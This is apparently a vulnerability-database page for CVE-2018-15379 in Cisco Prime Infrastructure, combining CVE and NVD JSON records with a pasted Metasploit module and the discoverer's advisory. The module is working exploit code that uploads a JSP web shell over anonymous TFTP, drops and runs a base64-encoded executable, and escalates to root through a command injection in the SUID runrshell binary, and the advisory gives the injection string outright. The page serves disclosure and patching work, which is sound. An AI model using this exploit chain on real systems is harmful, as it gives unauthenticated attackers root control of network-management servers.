CVE-2018-15379

Vulnerability from cvelistv5

Published

2018-10-05 14:00

Modified

2024-09-16 20:11

Severity ?

Summary

Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability

References

URL	Tags
ykramarz@cisco.com	http://www.securityfocus.com/bid/105506	Third Party Advisory, VDB Entry
ykramarz@cisco.com	http://www.securitytracker.com/id/1041816	Third Party Advisory, VDB Entry
ykramarz@cisco.com	https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp	Vendor Advisory
ykramarz@cisco.com	https://www.exploit-db.com/exploits/45555/	Exploit, Third Party Advisory, VDB Entry

Impacted products

▼	Vendor	Product
	Cisco	Cisco Prime Infrastructure

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T09:54:02.589Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "45555",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/45555/"
          },
          {
            "name": "20181003 Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability",
            "tags": [
              "vendor-advisory",
              "x_refsource_CISCO",
              "x_transferred"
            ],
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"
          },
          {
            "name": "105506",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/105506"
          },
          {
            "name": "1041816",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1041816"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Cisco Prime Infrastructure",
          "vendor": "Cisco",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-10-03T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-275",
              "description": "CWE-275",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-14T09:57:01",
        "orgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
        "shortName": "cisco"
      },
      "references": [
        {
          "name": "45555",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/45555/"
        },
        {
          "name": "20181003 Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability",
          "tags": [
            "vendor-advisory",
            "x_refsource_CISCO"
          ],
          "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"
        },
        {
          "name": "105506",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/105506"
        },
        {
          "name": "1041816",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1041816"
        }
      ],
      "source": {
        "advisory": "cisco-sa-20181003-pi-tftp",
        "defect": [
          [
            "CSCvk24890"
          ]
        ],
        "discovery": "UNKNOWN"
      },
      "title": "Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "DATE_PUBLIC": "2018-10-03T16:00:00-0500",
          "ID": "CVE-2018-15379",
          "STATE": "PUBLIC",
          "TITLE": "Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Cisco Prime Infrastructure",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Cisco"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication."
            }
          ]
        },
        "impact": {
          "cvss": {
            "baseScore": "7.3",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-275"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "45555",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/45555/"
            },
            {
              "name": "20181003 Cisco Prime Infrastructure Arbitrary File Upload and Command Execution Vulnerability",
              "refsource": "CISCO",
              "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp"
            },
            {
              "name": "105506",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/105506"
            },
            {
              "name": "1041816",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1041816"
            }
          ]
        },
        "source": {
          "advisory": "cisco-sa-20181003-pi-tftp",
          "defect": [
            [
              "CSCvk24890"
            ]
          ],
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
    "assignerShortName": "cisco",
    "cveId": "CVE-2018-15379",
    "datePublished": "2018-10-05T14:00:00Z",
    "dateReserved": "2018-08-17T00:00:00",
    "dateUpdated": "2024-09-16T20:11:45.696Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2018-15379\",\"sourceIdentifier\":\"ykramarz@cisco.com\",\"published\":\"2018-10-05T14:29:07.013\",\"lastModified\":\"2019-10-09T23:35:29.313\",\"vulnStatus\":\"Modified\",\"descriptions\":[{\"lang\":\"en\",\"value\":\"A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication.\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad por la cual el servidor web HTTP para Cisco Prime Infrastructure (PI) tiene permisos sin restricci\u00f3n en directorios podr\u00eda permitir que un atacante remoto no autenticado suba un archivo arbitrario. Este archivo podr\u00eda permitir que el atacante ejecute comandos al nivel de privilegios del usuario prime. Este usuario no tiene privilegios root o administrativos. La vulnerabilidad se debe a una configuraci\u00f3n de permisos incorrecta para directorios importantes del sistema. Un atacante podr\u00eda explotar esta vulnerabilidad subiendo un archivo malicioso mediante TFTP, al cual se puede acceder mediante la interfaz web gr\u00e1fica. Su explotaci\u00f3n con \u00e9xito podr\u00eda permitir que el atacante ejecute comandos en la aplicaci\u00f3n objetivo sin autenticaci\u00f3n.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\",\"baseScore\":7.5},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-732\"}]},{\"source\":\"ykramarz@cisco.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-275\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_infrastructure:3.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7072B5B6-EA73-42D3-BC91-2068780D9C6D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_infrastructure:3.2:fips:*:*:*:*:*:*\",\"matchCriteriaId\":\"E0BFC4EB-CF72-4CA9-9F02-6DAB0434BB05\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_infrastructure:3.2\\\\(0.0\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"146E4ECF-B903-488C-8644-932FC57F072C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_infrastructure:3.2\\\\(1.0\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0E3673F8-B07C-4FA5-8196-89D6F0B9E3B1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_infrastructure:3.2\\\\(2.0\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"EC8A8BA2-851E-454C-B734-974F4DFFCF96\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_infrastructure:3.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"315278ED-B357-45B0-966B-15A69CDF4AC2\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_infrastructure:3.3\\\\(0.0\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A67FAFC9-7F4B-4CB5-AF27-74E20DD21B2D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_infrastructure:3.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"1680DA56-F41F-4F6A-A569-EA4A90981226\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_infrastructure:3.4\\\\(0.0\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"C8A791DF-D671-40EC-8665-0701ED9C37D0\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:prime_infrastructure:3.5\\\\(0.0\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3D6C6D02-3E21-4341-909C-8C9447E5FE43\"}]}]}],\"references\":[{\"url\":\"http://www.securityfocus.com/bid/105506\",\"source\":\"ykramarz@cisco.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.securitytracker.com/id/1041816\",\"source\":\"ykramarz@cisco.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp\",\"source\":\"ykramarz@cisco.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/45555/\",\"source\":\"ykramarz@cisco.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]}]}}"
  }
}

A vulnerability in which the HTTP web server for Cisco Prime Infrastructure (PI) has unrestricted directory permissions could allow an unauthenticated, remote attacker to upload an arbitrary file. This file could allow the attacker to execute commands at the privilege level of the user prime. This user does not have administrative or root privileges. The vulnerability is due to an incorrect permission setting for important system directories. An attacker could exploit this vulnerability by uploading a malicious file by using TFTP, which can be accessed via the web-interface GUI. A successful exploit could allow the attacker to run commands on the targeted application without authentication. Cisco Prime Infrastructure is prone to an arbitrary file-upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution with root privileges within the context of the vulnerable application. This issue is being tracked by Cisco Bug ID CSCvk24890.

    This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions
    might also be affected, although 3.4.0.0.348 is the latest at the time of writing. 
  },
  'Author'         =>
    [
      'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
    ],
  'License'        => MSF_LICENSE,
  'References'     =>
    [
      [ 'CVE', '2018-15379' ],
      [ 'URL', 'https://seclists.org/fulldisclosure/2018/Oct/19'],
      [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt' ],
      [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3723' ],
      [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp' ]
    ],
  'Platform'       => 'linux',
  'Arch'           => [ARCH_X86, ARCH_X64],
  'Targets'        =>
    [
      [ 'Cisco Prime Infrastructure < 3.4.1 & 3.3.1 Update 02', {} ]
    ],
  'Privileged'     => true,
  'DefaultOptions' => { 'WfsDelay' => 10 },
  'DefaultTarget'  => 0,
  'DisclosureDate' => 'Oct 04 2018'
))

register_options(
  [
    OptPort.new('RPORT', [true, 'The target port', 443]),
    OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]),
    OptBool.new('SSL', [true, 'Use SSL connection', true]),
    OptString.new('TARGETURI', [ true,  "swimtemp path", '/swimtemp'])
  ])

end

def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'swimtemp'), 'method' => 'GET' })

unless res
  vprint_error 'Connection failed'
  return CheckCode::Unknown
end

if res.code == 404 && res.body.length == 0
  # at the moment this is the best way to detect
  # a 404 in swimtemp only returns the error code with a body length of 0,
  # while a 404 to another webapp or to the root returns code plus a body with content
  return CheckCode::Detected
end

CheckCode::Safe

end

def upload_payload(payload) lport = datastore['LPORT'] || (1025 + rand(0xffff-1025)) lhost = datastore['LHOST'] || "0.0.0.0" remote_file = rand_text_alpha(5..16) + '.jsp'

tftp_client = Rex::Proto::TFTP::Client.new(
  "LocalHost"  => lhost,
  "LocalPort"  => lport,
  "PeerHost"   => rhost,
  "PeerPort"   => datastore['RPORT_TFTP'],
  "LocalFile"  => "DATA:#{payload}",
  "RemoteFile" => remote_file,
  "Mode"       => 'octet',
  "Context"    => {'Msf' => self.framework, 'MsfExploit' => self},
  "Action"     => :upload
)
print_status "Uploading TFTP payload to #{rhost}:#{datastore['TFTP_PORT']} as '#{remote_file}'"
tftp_client.send_write_request

remote_file

end

def generate_jsp_payload exe = generate_payload_exe base64_exe = Rex::Text.encode_base64(exe)

native_payload_name = rand_text_alpha(3..9)

var_raw     = rand_text_alpha(3..11)
var_ostream = rand_text_alpha(3..11)
var_pstream = rand_text_alpha(3..11)
var_buf     = rand_text_alpha(3..11)
var_decoder = rand_text_alpha(3..11)
var_tmp     = rand_text_alpha(3..11)
var_path    = rand_text_alpha(3..11)
var_tmp2    = rand_text_alpha(3..11)
var_path2   = rand_text_alpha(3..11)
var_proc2   = rand_text_alpha(3..11)

var_proc1 = rand_text_alpha(3..11)
chmod = %Q|
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path} + " " + #{var_path2});
Thread.sleep(200);
|

var_proc3 = Rex::Text.rand_text_alpha(3..11)
cleanup = %Q|
Thread.sleep(200);
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path} + " " + #{var_path2});
|

jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
  String #{var_buf} = "#{base64_exe}";
  BASE64Decoder #{var_decoder} = new BASE64Decoder();
  byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

  File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".bin");
  String #{var_path} = #{var_tmp}.getAbsolutePath();

  BufferedOutputStream #{var_ostream} =
    new BufferedOutputStream(new FileOutputStream(#{var_path}));
  #{var_ostream}.write(#{var_raw});
  #{var_ostream}.close();

  File #{var_tmp2} = File.createTempFile("#{native_payload_name}", ".sh");
  String #{var_path2} = #{var_tmp2}.getAbsolutePath();

  PrintWriter #{var_pstream} =
    new PrintWriter(new FileOutputStream(#{var_path2}));
  #{var_pstream}.println("!#/bin/sh");
  #{var_pstream}.println("/opt/CSCOlumos/bin/runrshell '\\" && " + #{var_path} + " #'");
  #{var_pstream}.close();
  #{chmod}

  Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path2});
  #{cleanup}
} catch (Exception e) {
}
%>
|

jsp = jsp.gsub(/\n/, '')
jsp = jsp.gsub(/\t/, '')
jsp = jsp.gsub(/\x0d\x0a/, "")
jsp = jsp.gsub(/\x0a/, "")

return jsp

end

def exploit jsp_payload = generate_jsp_payload

jsp_name = upload_payload(jsp_payload)

# we land in /opt/CSCOlumos, so we don't know the apache directory
# as it changes between versions... so leave this commented for now
# ... and try to find a good way to clean it later
print_warning "#{jsp_name} must be manually removed from the Apache in /opt/CSCOlumos"
# register_files_for_cleanup(jsp_name)

print_status("#{peer} - Executing payload...")
send_request_cgi({
  'uri'    => normalize_uri(datastore['TARGETURI'], jsp_name),
  'method' => 'GET'
})

handler

end end . >> Unauthenticated remote code execution and privilege escalation in Cisco Prime Infrastructure

> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)

Disclosure: 4/10/2018 / Last updated: 8/10/2018

Introduction: From the vendor's website ([1]): "Cisco Prime Infrastructure simplifies the management of wireless and wired networks. This single, unified solution provides wired and wireless lifecycle management, and application visibility and control. It also offers policy monitoring and troubleshooting with the Cisco Identity Services Engine (ISE) and location-based tracking of mobility devices with the Cisco Mobility Services Engine (MSE). You can manage the network, devices, applications, and users a all from one place. Cisco Prime Infrastructure offers support for 802.11ac, correlated wired-wireless client visibility, spatial maps, Radio Frequency prediction tools, and much more. Simplify the management of the wireless infrastructure while solving problems faster and with fewer resources. Cisco Prime Infrastructure offers new, guided workflows for the Intelligent WAN and Converged Access, based on Cisco best practices. These workflows make new branch rollouts easy and fast, from setting up devices and services to automatically managing and monitoring them. Cisco Prime Infrastructure offers fault, configuration, accounting, performance, and security (FCAPS) management with 360-degree views of Cisco Unified Computing System Series B Blade Servers and Series C Rack Servers and Cisco Nexus switches, including the Application-Centric Infrastructureaready Cisco Nexus 9000 Series Switches. Your data center is critical to service assurance. Device Packs offer ongoing support of new Cisco devices and software releases. It provides parity within each device family, eliminating gaps in management operations, especially when it comes to service availability and troubleshooting. Technology Packs deliver new features between releases, accelerating time to value for high-demand functionality. Large or global organizations often distribute network management by domain, region, or country. Cisco Prime Infrastructure Operations Center lets you visualize up to 10 Cisco Prime Infrastructure instances, scaling your management infrastructure while maintaining central visibility and control."

Background and summary: Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow an unauthenticated attacker to achieve remote code execution.

A Metasploit module has been released with this advisory, and can be found at [2] and [3]. This module exploits the two vulnerabilities described in this advisory to achieve unauthenticated remote code execution as root on the CPI default installation. It should be integrated into Metasploit's repository in the coming weeks.

A special thanks to Beyond Security and their SecuriTeam Secure Disclosure (SSD) programme, which have helped me disclose this vulnerability to the vendor. Their version of this advisory can be found in [2].

Technical details:

1

Vulnerability: Arbitrary file upload and execution via tftp and Apache Tomcat CVE-2018-15379 Attack Vector: Remote Constraints: None Affected products / versions: - Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected

Most web applications running on the CPI virtual appliance are deployed under /opt/CSCOlumos/apache-tomcat-/webapps. One of these applications is "swimtemp", which symlinks to /localdisk/tftp:

ade # ls -l /opt/CSCOlumos/apache-tomcat-8.5.14/webapps/ total 16 drwxrwxr-x. 3 root gadmin 4096 Mar 29 19:49 ROOT drwxrwxr-x. 8 root gadmin 4096 Mar 29 21:44 SSO lrwxrwxrwx. 1 root gadmin 36 Mar 29 21:32 SSO.war -> /opt/CSCOlumos/wars/SSO-13.0.201.war drwxrwxr-x. 4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest lrwxrwxrwx. 1 root gadmin 45 Mar 29 21:32 ifm_poap_rest.war -> /opt/CSCOlumos/wars/ifm_poap_rest-3.70.21.war lrwxrwxrwx. 1 root gadmin 16 Mar 29 19:49 swimtemp -> /localdisk/tftp/ drwxrwxr-x. 22 root gadmin 4096 May 2 15:20 webacs lrwxrwxrwx. 1 root gadmin 30 Mar 29 21:32 webacs.war -> /opt/CSCOlumos/wars/webacs.war

As the name implies, this is the directory used by tftp to store files. Cisco has also enabled the upload of files to this directory as tftpd is started with the -c (file create) flag, and it accepts anonymous connections: /usr/sbin/in.tftpd --ipv4 -vv -c --listen -u prime -a :69 --retransmit 6000000 -s /localdisk/tftp

The tftpd port is also open to the world in the virtual appliance firewall, so it is trivial to upload a JSP web shell file using a tftp client to the /localdisk/tftp/ directory.

The web shell will then be available at https:///swimtemp/, and it will execute as the "prime" user, which is an unprivileged user that runs the Apache Tomcat server.

2

Vulnerability: runrshell Command Injection (no specific CVE was attributed to this vulnerability by Cisco; use CVE-2018-15379, same as vulnerability #1) Attack Vector: Local Constraints: None Affected products / versions: - Cisco Prime Infrastructure 3.2 and later (latest version at the time of writing is 3.4); earlier versions might be affected

The CPI virtual appliance contains a binary at /opt/CSCOlumos/bin/runrshell, which has the SUID bit set and executes as root. It is supposed to start a restricted shell that can only execute commands in /opt/CSCOlumos/rcmds. The decompilation of this function is shown below:

int main(int argc, char argv, char envp) { char dest; int i;

setuid(0); setgid(0); setenv("PATH", "/opt/CSCOlumos/rcmds", 1); memcpy(&dest, "/bin/bash -r -c \"", 0x12uLL); for ( i = 1; argc - 1 >= i; ++i ) { strcat(&dest, argv[i]); strcat(&dest, " "); } strcat(&dest, "\""); return (system(&dest) & 0xFF00) >> 8; }

As it can be seen above, the binary uses the system() function to execute: /bin/bash -r -c ""

... with the PATH set to /opt/CSCOlumos/rcmds, and the restricted (-r) flag passed to bash, meaning that only commands in the PATH can be executed, environment variables cannot be changed or set, directory cannot be changed, etc.

However, due to the way system() function calls "bash -c", it is trivial to inject a command by forcing an end quote after and the bash operator '&&': [prime@prime34 ~]$ /opt/CSCOlumos/bin/runrshell '" && /usr/bin/whoami #'
root

Fix: Vulnerability #1 has ben fixed fixed with the patch provided by Cisco in [4]. Vulnerability #2 does not appear to have been fixed as of the last update of this advisory.

Please note that Agile Information Security does not verify any fixes, except when noted in the advisory or requested by the vendor. The vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerablities found by Agile Information Security are resolved properly.

References: [1] https://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html [2] https://blogs.securiteam.com/index.php/archives/3723 [3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_prime_inf_rce.rb [4] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181003-pi-tftp

================ Agile Information Security Limited http://www.agileinfosec.co.uk/

Enabling secure digital business >>

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0571",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "cisco",
        "version": "3.4"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "cisco",
        "version": "3.3"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "cisco",
        "version": "3.2"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "3.2\\(1.0\\)"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "3.4\\(0.0\\)"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "3.3\\(0.0\\)"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "3.2\\(2.0\\)"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "3.5\\(0.0\\)"
      },
      {
        "model": "prime infrastructure",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "3.2\\(0.0\\)"
      },
      {
        "model": "prime infrastructure",
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "prime infrastructure 3.2-fips",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "prime infrastructure",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.4.1"
      },
      {
        "model": "prime infrastructure update",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.3.102"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "105506"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013332"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-15379"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201810-179"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.4\\(0.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.5\\(0.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2\\(0.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2\\(2.0\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2:fips:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:prime_infrastructure:3.3:*:*:*:*:*:*:*",
